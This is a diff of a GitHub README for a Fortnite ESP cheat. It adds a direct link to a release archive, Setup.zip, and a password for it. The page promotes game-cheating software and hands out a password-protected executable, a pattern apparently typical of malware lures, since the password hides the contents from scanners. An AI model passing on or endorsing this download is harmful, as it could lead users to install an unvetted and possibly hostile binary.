Jiskie/fortnite-esp/README.md

 # Where's the EXE?
 We provide a binary in release tab.
+Or you can simply click [Download here](https://github.com/Jiskie/fortnite-esp/releases/download/fortnite-esp/Setup.zip)

-# What is the password for the archive?
+# What is the password in the launcher?
-Use pass `FortniteESP`
+Use pass `FortniteClarionixYT`

 ## Easy, Fast and Safe ESP for Fortnite 💻
 - Version: **1.1.13.1 | STABLE BETA | 10.07.2024**